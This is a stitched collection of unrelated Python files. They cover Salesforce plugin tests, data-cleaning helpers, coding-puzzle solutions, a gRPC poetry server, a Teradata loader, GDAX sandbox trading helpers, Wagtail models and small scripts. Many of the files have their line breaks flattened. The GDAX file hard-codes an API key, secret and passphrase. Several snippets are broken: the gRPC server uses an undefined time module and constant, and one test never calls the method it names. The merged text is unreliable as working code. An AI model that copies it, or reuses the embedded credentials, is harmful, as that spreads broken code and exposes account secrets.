        """Reset the plugin connection, remove any leftover project directory,
        and (first run only) delete test metadata left in the org."""
        config.connection = MavensMatePluginConnection(client='Sublime Text')
        if os.path.exists(config.connection.workspace+"/MavensMateUnitTestProject"):
            shutil.rmtree(config.connection.workspace+"/MavensMateUnitTestProject")
        temp_client = MavensMateClient(credentials={"username":self.username, "password":self.password})
        if self.RunInitialDelete:
            helper.delete_metadata(
                temp_client,
                {
                    'ApexClass'     : ['apex_class_from_unit_test_123'],
                    'ApexTrigger'   : ['apex_trigger_from_unit_test_123'],
                    'ApexPage'      : ['apex_page_from_unit_test_123'],
                    'ApexComponent' : ['apex_component_from_unit_test_123']
                }
            )
            # Assign on the class so the flag persists across test instances.
            self.__class__.RunInitialDelete = False

    def test_index_project(self):
        # NOTE(review): missing parentheses — this only references the bound
        # method without calling it, so this test exercises nothing.
        config.connection.new_project

    def test_clean_project(self):
        """new_project + clean should leave the expected directory skeleton."""
        config.connection.new_project(params={
            "project_name"  : self.project_name,
            "username"      : self.username,
            "password"      : self.password,
            "org_type"      : self.org_type,
            "package"       : config.base_path+'/test/resources/package.xml' #=> this should be a dict of package contents or the location of a package.xml
        },action='new')
        config.connection.project.clean()
        self.assertTrue(os.path.isdir(config.connection.workspace+"/MavensMateUnitTestProject"))
        self.assertTrue(os.path.isdir(config.connection.workspace+"/MavensMateUnitTestProject"+"/config"))
        self.assertTrue(os.path.isdir(config.connection.workspace+"/MavensMateUnitTestProject"+"/src"))
        self.assertTrue(os.path.isdir(config.connection.workspace+"/MavensMateUnitTestProject"+"/src/classes"))
        self.assertTrue(os.path.isdir(config.connection.workspace+"/MavensMateUnitTestProject"+"/src/components"))
        self.assertTrue(os.path.isdir(config.connection.workspace+"/MavensMateUnitTestProject"+"/src/objects"))
        self.assertTrue(os.path.isdir(config.connection.workspace+"/MavensMateUnitTestProject"+"/src/pages"))
        self.assertTrue(os.path.isfile(config.connection.workspace+"/MavensMateUnitTestProject"+"/src/package.xml"))

    def test_create_new_apex_class(self):
        """Creating an ApexClass should deploy successfully; clean up after."""
        config.connection.new_project(params={
            "project_name"  : self.project_name,
            "username"      : self.username,
            "password"      : self.password,
            "org_type"      : self.org_type,
            "package"       : config.base_path+'/test/resources/package.xml' #=> this should be a dict of package contents or the location of a package.xml
        },action='new')
        deploy_result = config.connection.project.new_metadata(
            api_name            = 'apex_class_from_unit_test_123',
            apex_class_type     = 'default',
            metadata_type       = 'ApexClass'
        )
        print deploy_result
        self.assertTrue(deploy_result.success == True)
        helper.delete_metadata(config.connection.project.sfdc_client, {'ApexClass':['apex_class_from_unit_test_123']})

    def test_compile_project(self):
        """A freshly created project should compile without errors."""
        config.connection.new_project(params={
            "project_name"  : self.project_name,
            "username"      : self.username,
            "password"      : self.password,
            "org_type"      : self.org_type,
            "package"       : config.base_path+'/test/resources/package.xml' #=> this should be a dict of package contents or the location of a package.xml
        },action='new')
        deploy_result = config.connection.project.compile()
        print deploy_result
        self.assertTrue(deploy_result.success == True)

    def test_create_new_apex_trigger(self):
        """Creating an ApexTrigger on Account should deploy; clean up after."""
        config.connection.new_project(params={
            "project_name"  : self.project_name,
            "username"      : self.username,
            "password"      : self.password,
            "org_type"      : self.org_type,
            "package"       : config.base_path+'/test/resources/package.xml' #=> this should be a dict of package contents or the location of a package.xml
        },action='new')
        deploy_result = config.connection.project.new_metadata(
            api_name                        = 'apex_trigger_from_unit_test_123',
            metadata_type                   = 'ApexTrigger',
            apex_trigger_object_api_name    = 'Account'
        )
        print deploy_result
        self.assertTrue(deploy_result.success == True)
        helper.delete_metadata(config.connection.project.sfdc_client, {'ApexTrigger':['apex_trigger_from_unit_test_123']})

    def test_create_new_apex_page(self):
        """Creating an ApexPage should deploy successfully; clean up after."""
        config.connection.new_project(params={
            "project_name"  : self.project_name,
            "username"      : self.username,
            "password"      : self.password,
            "org_type"      : self.org_type,
            "package"       : config.base_path+'/test/resources/package.xml' #=> this should be a dict of package contents or the location of a package.xml
        },action='new')
        deploy_result = config.connection.project.new_metadata(
            api_name            = 'apex_page_from_unit_test_123',
            metadata_type       = 'ApexPage'
        )
        print deploy_result
        self.assertTrue(deploy_result.success == True)
        helper.delete_metadata(config.connection.project.sfdc_client, {'ApexPage':['apex_page_from_unit_test_123']})

    def test_create_new_apex_component(self):
        """Creating an ApexComponent should deploy; clean up after."""
        config.connection.new_project(params={
            "project_name"  : self.project_name,
            "username"      : self.username,
            "password"      : self.password,
            "org_type"      : self.org_type,
            "package"       : config.base_path+'/test/resources/package.xml' #=> this should be a dict of package contents or the location of a package.xml
        },action='new')
        deploy_result = config.connection.project.new_metadata(
            api_name            = 'apex_component_from_unit_test_123',
            metadata_type       = 'ApexComponent'
        )
        print deploy_result
        self.assertTrue(deploy_result.success == True)
        helper.delete_metadata(config.connection.project.sfdc_client, {'ApexComponent':['apex_component_from_unit_test_123']})

    def do_test_assumptions(self):
        pass

    def tearDown(self):
        try:
            pass
            #shutil.rmtree(config.connection.workspace+"/MavensMateUnitTestProject")
        except:
            pass

if __name__ == '__main__':
    unittest.main()
import numpy as np import numpy.random as npr import matplotlib.pyplot as plt plt.close('all') plt.rcParams.update({'font.size': 12}) plt.rcParams['font.family'] = 'sans-serif' # Load the training history, calulate stats, then plot hist = np.load('hist_train.npy') print('\n'+"TRAINING:_____________") print("AVERAGE SCORE: %0.3f"%(np.mean(hist))) print("MAX SCORE: %0.3f"%(np.max(hist))) plt.figure() plt.plot(hist,'o') plt.title('Training') plt.xlabel("Epoch") plt.ylabel("Game Score") plt.savefig('results_train.png',dpi = 300) plt.show() # Load the testing history, calulate stats, then plot hist = np.load('hist_test.npy') print('\n'+"FINAL TEST:_____________") print("AVERAGE SCORE: %0.3f"%(np.mean(hist))) print("MAX SCORE: %0.3f"%(np.max(hist))) plt.figure() plt.plot(hist,'o') plt.title('Testing') plt.xlabel("Epoch") plt.ylabel("Game Score") plt.savefig('results_test.png',dpi = 300) plt.show()
# -*- coding: utf-8 -*-
"""
Created on Sun Jul 21 17:14:23 2019

@author: smorandv

Cleaning / normalisation helpers for the CTG feature table.

NOTE: matplotlib is imported lazily inside norm_standard() (which already
contained a local import), so the data-cleaning functions work without a
plotting backend installed.
"""
import numpy as np
import pandas as pd


def rm_ext_and_nan(CTG_features, extra_feature):
    """
    :param CTG_features: Pandas DataFrame of CTG features
    :param extra_feature: A feature (column name) to be removed
    :return: A dictionary of clean numeric Series called c_ctg
    """
    # 'coerce' turns non-numeric junk into NaN, which dropna() then removes.
    c_ctg = {col: pd.to_numeric(CTG_features[col], errors='coerce').dropna()
             for col in CTG_features if col != extra_feature}
    return c_ctg


def nan2num_samp(CTG_features, extra_feature):
    """
    :param CTG_features: Pandas DataFrame of CTG features
    :param extra_feature: A feature (column name) to be removed
    :return: A pandas DataFrame of the dictionary c_cdf containing the "clean" features

    Missing/non-numeric entries are imputed by random sampling from the
    observed values of the same column.
    """
    c_cdf = {}
    for col in CTG_features:
        if col == extra_feature:
            # BUG FIX: the original never inserted this key but then ran
            # `del c_cdf[extra_feature]`, which always raised KeyError.
            continue
        numeric = pd.to_numeric(CTG_features[col], errors='coerce')
        observed = numeric.dropna().to_numpy()
        nan_mask = numeric.isna()
        # Draw replacements only from observed (non-NaN) values — the
        # original sampled from the full column and retried on NaN draws.
        if nan_mask.any() and observed.size:
            numeric[nan_mask] = np.random.choice(observed, size=int(nan_mask.sum()))
        c_cdf[col] = numeric
    return pd.DataFrame(c_cdf)


def sum_stat(c_feat):
    """
    :param c_feat: Output of nan2num_samp
    :return: Summary statistics as a dictionary of dictionaries (called d_summary)
    """
    d_summary = {}
    for col in c_feat:
        d_summary[col] = {
            'Min': np.amin(c_feat[col]),
            'Max': np.amax(c_feat[col]),
            'Median': np.median(c_feat[col]),
            'Q1': np.quantile(c_feat[col], 0.25),
            'Q3': np.quantile(c_feat[col], 0.75),
        }
    return d_summary


def rm_outlier(c_feat, d_summary):
    """
    :param c_feat: Output of nan2num_samp
    :param d_summary: Output of sum_stat
    :return: DataFrame of the dictionary c_no_outlier containing the features with outliers removed
    """
    c_no_outlier = {}
    for col, series in c_feat.items():
        # Tukey fences: keep values in [Q1 - 1.5*IQR, Q3 + 1.5*IQR].
        iqr = d_summary[col]['Q3'] - d_summary[col]['Q1']
        upper = d_summary[col]['Q3'] + 1.5 * iqr
        lower = d_summary[col]['Q1'] - 1.5 * iqr
        c_no_outlier[col] = series[(series <= upper) & (series >= lower)]
    return pd.DataFrame(c_no_outlier)


def phys_prior(c_cdf, feature, thresh):
    """
    :param c_cdf: Output of nan2num_samp
    :param feature: A string naming the selected feature
    :param thresh: A numeric threshold; values above it are dropped
    :return: The "filtered" feature called filt_feature
    """
    filt_feature = c_cdf[feature][c_cdf[feature] <= thresh]
    return filt_feature


def norm_standard(CTG_features, selected_feat=('LB', 'ASTV'), mode='none', flag=False):
    """
    :param CTG_features: Pandas DataFrame of CTG features
    :param selected_feat: A two-element tuple of feature names for comparison
    :param mode: One of 'none', 'standard', 'MinMax', 'mean'
    :param flag: If True, plot a histogram of the two selected features
    :return: DataFrame of the normalized/standardized features called nsd_res
    """
    x, y = selected_feat
    nsd_res = {}
    if mode == 'none':
        nsd_res = CTG_features.to_dict()
    elif mode == 'standard':
        # Zero mean, unit variance.
        nsd_res = {c: (CTG_features[c] - np.mean(CTG_features[c])) / np.std(CTG_features[c])
                   for c in CTG_features}
    elif mode == 'MinMax':
        # Rescale to [0, 1].
        nsd_res = {c: (CTG_features[c] - np.amin(CTG_features[c])) /
                      (np.amax(CTG_features[c]) - np.amin(CTG_features[c]))
                   for c in CTG_features}
    elif mode == 'mean':
        # Mean-centered, range-scaled.
        nsd_res = {c: (CTG_features[c] - np.mean(CTG_features[c])) /
                      (np.amax(CTG_features[c]) - np.amin(CTG_features[c]))
                   for c in CTG_features}
    if flag:
        import matplotlib.pyplot as plt  # deferred: only needed when plotting
        pd.DataFrame(nsd_res)[[x, y]].plot(kind='hist', bins=100)
        plt.ylabel('Counts')
        plt.xlabel('Values')
        plt.title(mode)
        plt.legend()
        plt.show()
    return pd.DataFrame(nsd_res)
from unittest import TestCase from p17.Solution import Solution class TestSolution(TestCase): def test_letterCombinations(self): sol = Solution() self.assertEqual([], sol.letterCombinations("")) self.assertEqual(["a", "b", "c"], sol.letterCombinations("2")) self.assertEqual(["d", "e", "f"], sol.letterCombinations("3")) self.assertEqual(["g", "h", "i"], sol.letterCombinations("4")) self.assertEqual(["j", "k", "l"], sol.letterCombinations("5")) self.assertEqual(["m", "n", "o"], sol.letterCombinations("6")) self.assertEqual(["p", "q", "r", 's'], sol.letterCombinations("7")) self.assertEqual(["t", "u", "v"], sol.letterCombinations("8")) self.assertEqual(["w", "x", "y", "z"], sol.letterCombinations("9")) def test_handle_double_or_more_numbers(self): sol = Solution() self.assertEqual(["ad", "ae", "af", "bd", "be", "bf", "cd", "ce", "cf"], sol.letterCombinations("23")) tmp1 = ["adg", "aeg", "afg", "bdg", "beg", "bfg", "cdg", "ceg", "cfg", "adh", "aeh", "afh", "bdh", "beh", "bfh", "cdh", "ceh", "cfh", "adi", "aei", "afi", "bdi", "bei", "bfi", "cdi", "cei", "cfi"] print(tmp1.sort()) self.assertEqual(tmp1, sol.letterCombinations("234")) def test_should_handle_key_1(self): sol = Solution() self.assertEqual([], sol.letterCombinations("1")) self.assertEqual([], sol.letterCombinations("111")) self.assertEqual(['a', 'b', 'c'], sol.letterCombinations("12")) self.assertEqual(['a', 'b', 'c'], sol.letterCombinations("21")) self.assertEqual(['a', 'b', 'c'], sol.letterCombinations("11211")) self.assertEqual(["ad", "ae", "af", "bd", "be", "bf", "cd", "ce", "cf"], sol.letterCombinations("11211311"))
import grpc import poetry_pb2 import poetry_pb2_grpc import poetry_gen from concurrent import futures import grpc if __name__ == '__main__': gen = poetry_gen.FullModel() print(gen.predict("poop")) class GeneratePoetryServicer(poetry_pb2_grpc.GeneratePoetryServicer): """Provides methods that implement functionality of GeneratePoetry server.""" def __init__(self): self.full_model = poetry_gen.FullModel() def GeneratePoetry(self, request, context): return self.full_model.predict(request.Text) def serve(): server = grpc.server(futures.ThreadPoolExecutor(max_workers=10)) poetry_pb2_grpc.add_GeneratePoetryServicer_to_server( GeneratePoetryServicer(), server) server.add_insecure_port('localhost:8080') server.start() try: while True: time.sleep(_ONE_DAY_IN_SECONDS) except KeyboardInterrupt: server.stop(0) if __name__ == '__main__': serve()
class Solution: def minDistance(self, word1: str, word2: str) -> int: l1 = len(word1) l2 = len(word2) dp = [[-1 for _ in range(l2 + 1)] for _ in range(l1 + 1)] for i in range(l2 + 1): dp[0][i] = i for j in range(l1 + 1): dp[j][0] = j for i in range(1, l1+1): for j in range(1, l2+1): if word1[i-1] == word2[j-1]: dp[i][j] = dp[i-1][j-1] else: dp[i][j] = min(dp[i-1][j-1], dp[i-1][j], dp[i][j-1]) + 1 return dp[l1][l2] print(Solution().minDistance('intention', 'execution'))
import xmlrpclib import sys import random import time def randint(): return random.randint(2**29, 2**30) proxy = xmlrpclib.ServerProxy("http://{0}:10010/".format(sys.argv[1])) starttime = time.time() ctime = time.time() c = 0 print int(ctime*1000), c while ctime - starttime < 60.0: a = randint() b = randint() res = proxy.add(a,b) ctime = time.time() if res != a+b: print 'error, res!= a+b', res, a+b break c += 1 if c % 1000 == 0: print int(ctime*1000), c ctime = time.time() print int(ctime*1000), c
# -*- coding: utf-8 -*-
#
# Copyright 2016 Capital One Services, LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.

import datetime

from collections import defaultdict

from .cmd import *
from .connection import *
from .constants import *
from .encoders import *
from .errors import *
from .io import *
from .logging import *
from .sql import *
from .types import *
from .utils import *


__all__ = ['TeradataLoad']


class TeradataLoad(TeradataCmd):
    """
    The class for inserting into Teradata tables using CLIv2. Exposed under
    the alias :class:`giraffez.Load`.

    This class should be used for inserting into Teradata tables in all but
    very large (> ~100k rows) cases.

    See :class:`~giraffez.cmd.TeradataCmd` for constructor arguments.

    Meant to be used, where possible, with python's :code:`with` context
    handler to guarantee that connections will be closed gracefully when
    operation is complete:

    .. code-block:: python

       with giraffez.Load() as load:
           load.from_file('database.my_table', 'myfile.txt')
           # continue executing statements and processing results
    Use in this manner guarantees proper exit-handling and disconnection
    when operation is completed (or interrupted).
    """

    def from_file(self, table_name, input_file_name, delimiter=None, null=DEFAULT_NULL,
            date_conversion=False, quotechar='"'):
        """
        Load a text file into the specified :code:`table_name`

        For most insertions, this will be faster and produce less strain on
        Teradata than using :class:`~giraffez.load.TeradataMLoad`
        (:class:`giraffez.MLoad`).
        Requires that the input file be a properly delimited text file, with
        a header that corresponds to the target fields for insertion. Valid
        delimiters include '|', ',', and '\\t' (tab).

        :param str table_name: The name of the destination table
        :param str input_file_name: The name of the file to read rows from
        :param str delimiter: The delimiter used by the input file (or
            :code:`None` to infer it from the header).
        :param str quotechar: The character used to quote fields containing
            special characters, like the delimiter.
        :param str null: The string used to indicated nulled values in the
            file (defaults to :code:`'NULL'`).
        :param bool date_conversion: If :code:`True`, attempts to coerce date
            fields into a standard format (defaults to :code:`False`).
        :return: A dictionary containing counts of applied rows and errors
        :rtype: dict
        """
        with Reader(input_file_name, delimiter=delimiter, quotechar=quotechar) as f:
            # Lazily convert the configured null token in each raw line.
            preprocessor = null_handler(null)
            rows = (preprocessor(l) for l in f)
            # Record the reader's effective settings for the post-run log.
            if isinstance(f, CSVReader):
                self.options("delimiter", f.reader.dialect.delimiter, 1)
                self.options("quote char", f.reader.dialect.quotechar, 2)
            elif isinstance(f, JSONReader):
                self.options("encoding", "json", 1)
            # The file's header row supplies the target field names.
            return self.insert(table_name, rows, fields=f.header,
                date_conversion=date_conversion)

    def insert(self, table_name, rows, fields=None, date_conversion=True):
        """
        Insert Python :code:`list` rows into the specified :code:`table_name`

        :param str table_name: The name of the destination table
        :param list rows: A list of rows. Each row must be a :code:`list` of
            field values.
        :param list fields: The names of the target fields, in the order that
            the data will be presented (defaults to :code:`None` for all
            columns in the table).
        :param bool date_conversion: If :code:`True`, attempts to coerce date
            fields into a standard format (defaults to :code:`True`).
        :return: A dictionary containing counts of applied rows and errors
        :rtype: dict
        :raises `giraffez.errors.GiraffeEncodeError`: if the number of values
            in a row does not match the length of :code:`fields`
        :raises `giraffez.errors.GiraffeError`: if :code:`panic` is set and
            the insert statement caused an error.
        """
        columns = self.get_columns(table_name)
        if fields is None:
            fields = columns.safe_names
        columns.set_filter(fields)
        # Validate that the provided fields match the table's columns.
        check_input(columns, fields)
        stats = defaultdict(int)
        # Encoder pipeline: turn each Python row into an SQL INSERT statement.
        processor = pipeline([
            python_to_sql(table_name, columns, date_conversion)
        ])

        def _fetch():
            # Generator that batches encoded statements into blocks no larger
            # than CLI_BLOCK_SIZE, counting applied rows and encode errors
            # into the enclosing `stats` as it goes.
            stats['count'] = 0
            current_block = ""
            for row in rows:
                try:
                    stmt = processor(row)
                except GiraffeError as error:
                    # In panic mode any encode failure aborts the whole load;
                    # otherwise the row is logged, counted, and skipped.
                    if self.panic:
                        raise error
                    log.info("Load", error)
                    stats['errors'] += 1
                    continue
                if len(current_block + stmt) > CLI_BLOCK_SIZE:
                    yield current_block
                    current_block = ""
                current_block += stmt
                stats['count'] += 1
            # Flush the final partial block.
            if current_block:
                yield current_block

        log.info("Load", "Executing ...")
        for block in _fetch():
            self.execute_many(block, sanitize=True, parallel=True,
                silent=True)
        log.info(self.options)
        return stats
# -*- coding: utf-8 -*- n = int(raw_input()) p = set(filter(lambda x: x, map(int, raw_input().split(' '))[1:])) q = set(filter(lambda x: x, map(int, raw_input().split(' '))[1:])) if len(p | q) >= n: print('I become the guy.') else: print('Oh, my keyboard!')
from django.apps import AppConfig class PolideportivoConfig(AppConfig): name = 'polideportivo'
"""Minimal GDAX (Coinbase Exchange) sandbox trading helpers."""
import requests
import base64, hashlib, hmac, time
from requests.auth import AuthBase
import json


def products():
    """Return the product list from the GDAX sandbox REST API."""
    # sandbox api base
    api_base = 'https://api-public.sandbox.gdax.com'
    response = requests.get(api_base + '/products')
    # BUG FIX: `is not 200` compared object identity with an int literal;
    # value comparison requires `!=`.
    if response.status_code != 200:
        raise Exception('Invalid GDAX Status Code: %d' % response.status_code)
    return response.json()


class GDAXRequestAuth(AuthBase):
    """requests auth hook implementing the GDAX HMAC signing scheme:
    CB-ACCESS-SIGN = base64(HMAC-SHA256(base64-decoded secret,
    timestamp + method + path + body))."""

    def __init__(self, api_key, secret_key, passphrase):
        self.api_key = api_key
        self.secret_key = secret_key
        self.passphrase = passphrase

    def __call__(self, request):
        timestamp = str(time.time())
        message = timestamp + request.method + request.path_url + (request.body or '')
        hmac_key = base64.b64decode(self.secret_key)
        signature = hmac.new(hmac_key, message.encode('utf-8'), hashlib.sha256)
        signature_b64 = base64.b64encode(signature.digest())
        request.headers.update({
            'CB-ACCESS-SIGN': signature_b64,
            'CB-ACCESS-TIMESTAMP': timestamp,
            'CB-ACCESS-KEY': self.api_key,
            'CB-ACCESS-PASSPHRASE': self.passphrase,
            'Content-Type': 'application/json'
        })
        return request


def buy_market(product_id, size):
    """Place a market buy order for `size` of `product_id`.

    Uses the module-level api_key/api_secret/passphrase/api_base globals.
    """
    auth = GDAXRequestAuth(api_key, api_secret, passphrase)
    order_data = {
        'type': 'market',
        'side': 'buy',
        'product_id': product_id,
        'size': size
    }
    response = requests.post(api_base + '/orders', data=json.dumps(order_data), auth=auth)
    if response.status_code != 200:
        raise Exception('Invalid GDAX Status Code: %d' % response.status_code)
    return response.json()


def buy_limit(product_id, price, size, time_in_force='GTC', cancel_after=None, post_only=None):
    """Place a limit buy order at `price` for `size` of `product_id`.

    time_in_force: 'GTC', 'GTT' (requires cancel_after), 'IOC', or 'FOK'.
    """
    auth = GDAXRequestAuth(api_key, api_secret, passphrase)
    order_data = {
        # BUG FIX: the original sent type 'market' and never sent `price`,
        # so the `price` parameter was silently ignored.
        'type': 'limit',
        'side': 'buy',
        'product_id': product_id,
        'price': price,
        'size': size,
        'time_in_force': time_in_force
    }
    # BUG FIX: the original tested `'time_in_force' is 'GTC'`, comparing two
    # string literals with `is` — the argument was never inspected.
    # cancel_after is only valid for GTT orders.
    if time_in_force == 'GTT':
        order_data['cancel_after'] = cancel_after
    # post_only is meaningless for immediate-or-cancel / fill-or-kill orders.
    if time_in_force not in ('IOC', 'FOK'):
        order_data['post_only'] = post_only
    response = requests.post(api_base + '/orders', data=json.dumps(order_data), auth=auth)
    if response.status_code != 200:
        raise Exception('Invalid GDAX Status Code: %d' % response.status_code)
    return response.json()


def order_status(order_id):
    """Fetch the status of a single order (uses module-level `auth`)."""
    order_url = api_base + '/orders/' + order_id
    response = requests.get(order_url, auth=auth)
    if response.status_code != 200:
        raise Exception('Invalid GDAX Status Code: %d' % response.status_code)
    return response.json()


if __name__ == "__main__":
    api_base = 'https://api-public.sandbox.gdax.com'
    # NOTE(security): hard-coded credentials (even sandbox keys) should be
    # moved to environment variables and never committed to source control.
    api_key = '637963ff851b6409c3c2c715abfe7ecc'
    api_secret = 'hmIZU7fjOq50yW/eH+WkCcPh2Wdjqf8Lk4/6/J0PBPCne5bKC1Gj6cznQcGdp0QMI/01dIJVwYweAkIEUm5Twg=='
    passphrase = 'hobbe$C01N'
    auth = GDAXRequestAuth(api_key, api_secret, passphrase)
    order_url = api_base + '/orders'
    order_data = {
        'type': 'market',
        'side': 'buy',
        'product_id': 'BTC-USD',
        'size': '0.01'
    }
    response = requests.post(order_url, data=json.dumps(order_data), auth=auth)
    print(response.json())
Testcase = eval(input()) for i in range(Testcase): enemy = [] guyeok, W = map(int,input().split()) enemy.append(list(map(int,input().split()))) enemy.append(list(map(int,input().split()))) chk = [0 for _ in range(guyeok*2)] hap = 0 orders = [] chk = [0 for _ in range(guyeok*2)] for i in range(guyeok): hap = enemy[0][i] + enemy[0][(i+1)%guyeok] if guyeok > 1 and hap <= W: orders.append([hap,i,(i+1)%guyeok]) hap = enemy[1][i] + enemy[1][(i+1)%guyeok] if guyeok > 1 and hap <= W: orders.append([hap,i + guyeok,(i+1)%guyeok + guyeok]) hap = enemy[0][i] + enemy[1][i] if hap <= W: orders.append([hap,i,i + guyeok]) orders.sort(reverse=True) cnt = 0 for i in orders: if chk[i[1]-1] == 0 and chk[i[2]-1] == 0: chk[i[1]-1] = 1 chk[i[2]-1] = 1 cnt += 1 print(cnt+(guyeok-cnt)*2)
from __future__ import absolute_import, unicode_literals from django.db import models from django import forms from wagtail.wagtailcore.models import Page from wagtail.wagtailcore.fields import StreamField from wagtail.wagtailadmin.edit_handlers import FieldPanel, StreamFieldPanel from wagtail.wagtailcore.blocks import CharBlock, FieldBlock, RawHTMLBlock, RichTextBlock, \ StreamBlock, StructBlock, TextBlock from wagtail.wagtailimages.blocks import ImageChooserBlock from wagtail.wagtaildocs.blocks import DocumentChooserBlock from wagtail.wagtailsearch import index # Streamfield definition class ImageFormatChoiceBlock(FieldBlock): field = forms.ChoiceField(choices=( ('left', 'Wrap left'), ('right', 'Wrap right'), ('mid', 'Mid width'), ('full', 'Full width'), )) class HTMLAlignmentChoiceBlock(FieldBlock): field = forms.ChoiceField(choices=( ('normal', 'Normal'), ('full', 'Full width'), )) class AlignedHTMLBlock(StructBlock): html = RawHTMLBlock() alignment = HTMLAlignmentChoiceBlock() class ImageBlock(StructBlock): image = ImageChooserBlock() caption = RichTextBlock() alignment = ImageFormatChoiceBlock() class PullQuoteBlock(StructBlock): quote = TextBlock("quote title") attribution = CharBlock() class HomeStreamBlock(StreamBlock): h2 = CharBlock(icon="title", classname="title") h3 = CharBlock(icon="title", classname="title") h4 = CharBlock(icon="title", classname="title") intro = RichTextBlock(icon="pilcrow") paragraph = RichTextBlock(icon="pilcrow") aligned_image = ImageBlock(label="Aligned image", icon="image") pullquote = PullQuoteBlock(icon="openquote") aligned_html = AlignedHTMLBlock(icon="code", label='Raw HTML') document = DocumentChooserBlock(icon="doc-full-inverse") class HomePage(Page): body = StreamField(HomeStreamBlock()) search_fields = Page.search_fields + [ index.SearchField('body'), ] content_panels = Page.content_panels + [ StreamFieldPanel('body'), ] class Meta: verbose_name = "Homepage"
class Vrtx:
    """A named graph vertex carrying its neighbours and incident edges."""

    def __init__(self, n):
        self.name = n
        self.data = {'neighbours': [], 'edges': []}

    def add_neighbours(self, v):
        """Record *v* as a neighbour, deduplicated and kept sorted."""
        neighbours = self.data['neighbours']
        if v in neighbours:
            return
        neighbours.append(v)
        neighbours.sort()


class Graph:
    """Adjacency registry keyed by vertex name (shares each vertex's list)."""

    def __init__(self):
        self.vertices = {}

    def add_vertices(self, vrt):
        """Register a Vrtx under its name; ignore non-Vrtx or duplicates."""
        if isinstance(vrt, Vrtx):
            self.vertices.setdefault(vrt.name, vrt.data['neighbours'])

    def add_edge(self, vrt, u, v):
        """Attach edge (u, v) to *vrt* if it is registered and an endpoint."""
        registered = isinstance(vrt, Vrtx) and vrt.name in self.vertices
        if registered and vrt.name in (u, v):
            vrt.data['edges'].append((u, v))

    def print_graph(self, vrt):
        """Dump the vertex payload and the whole adjacency registry."""
        print(vrt.data)
        print(self.vertices)


v = Vrtx('A')
for neighbour in ('B', 'C', 'D'):
    v.add_neighbours(neighbour)

g = Graph()
g.add_vertices(v)
for endpoints in (('C', 'D'), ('A', 'D'), ('A', 'B')):
    g.add_edge(v, *endpoints)
g.print_graph(v)
# For each of n test pairs (x, y): print "NO" exactly when x exceeds y by one,
# otherwise "YES".
n_sets = int(input())
for _ in range(n_sets):
    x, y = map(int, input().split())
    print("NO" if x - y == 1 else "YES")
"""Tests for the long_running notification mixins."""
import pytest

from long_running.notification_mixins import (
    ASGINotificationMixin,
    NullNotificationMixin,
)


@pytest.fixture
def fake_rekord():
    """A minimal ASGINotificationMixin carrier with a fixed pk."""
    class FakeRekord(ASGINotificationMixin):
        pk = 500

    return FakeRekord()


def test_ASGINotificationMixin_asgi_channel_name(fake_rekord):
    # The channel name is derived from the pk.
    assert fake_rekord.asgi_channel_name == "500"


def test_ASGINotificationMixin_send_notification(fake_rekord, mocker):
    from notifications import core

    mocker.patch("notifications.core.send_notification")
    fake_rekord.send_notification("msg")
    core.send_notification.assert_called_once_with("500", 20, "msg")


def test_ASGINotificationMixin_send_progress(fake_rekord, mocker):
    from notifications import core

    mocker.patch("notifications.core._send")
    fake_rekord.send_progress(20)
    core._send.assert_called_once()


@pytest.mark.django_db
def test_ASGINotificationMixin_send_processing_finished(fake_rekord, mocker):
    from notifications import core

    mocker.patch("notifications.core._send")
    fake_rekord.send_processing_finished()
    core._send.assert_called()


def test_NullNotificationMixin():
    # BUG FIX: this was named `tesT_NullNotificationMixin`, so pytest's
    # default discovery (test_* prefix) never collected or ran it.
    x = NullNotificationMixin()
    x.send_notification()
    x.send_processing_finished()
    assert True
import datetime

from project import app
from project.models import db


# Id Expression
# 1 = netral, 2 = bahagia, 3 = sedih, 4 = terkejut
class Expression(db.Model):
    """Lookup table of facial-expression labels (see id mapping above)."""
    __tablename__ = 'expression'

    # Surrogate primary key.
    id_expression = db.Column(db.Integer, primary_key=True)
    # Human-readable label, e.g. "netral", "bahagia".
    expression_name = db.Column(db.String(20), nullable=False)
    # BUG FIX: pass the callable, not its result. `datetime.datetime.now()`
    # was evaluated once at import time, stamping every row with the moment
    # the module was loaded instead of the moment of insertion.
    created_at = db.Column(db.DateTime, default=datetime.datetime.now)

    def __repr__(self):
        return '<expression {0}>'.format(self.expression_name)
#!/usr/bin/env python # # FFF - Flexible Force Field # Copyright (C) 2010 Jens Erik Nielsen # # This program is free software: you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation, either version 3 of the License, or # (at your option) any later version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program. If not, see <http://www.gnu.org/licenses/>. # # Contact information: # Email: Jens.Nielsen_at_gmail.com # Normal mail: # Jens Nielsen # SBBS, Conway Institute # University College Dublin # Dublin 4, Ireland import sys crgfile=sys.argv[1] radfile=sys.argv[2] def get_values(filename): fd=open(filename) lines=fd.readlines() fd.close() data={} count=0 record=False while 1: line=lines[count].strip() if len(line)==0: count=count+1 continue if line[0]=='*': record=True if lines[count].strip()=='#END': break count=count+1 if not record: continue # done=False recordname=lines[count].strip() count=count+1 atoms={} #print 'Got record name',recordname while not done: if len(lines[count].strip())==0: done=True break atom=lines[count].strip().split() atoms[atom[0]]=float(atom[1]) count=count+1 data[recordname]=atoms.copy() return data if __name__=='__main__': crg=get_values(crgfile) rad=get_values(radfile) print '#BEGIN' records=crg.keys() records.sort() for record in records: print '*' print record atoms=crg[record].keys() atoms.sort() for atom in atoms: charge=crg[record][atom] radius=rad[record][atom] print '%5s %6.3f %6.3f' %(atom,charge,radius) print print '#END'
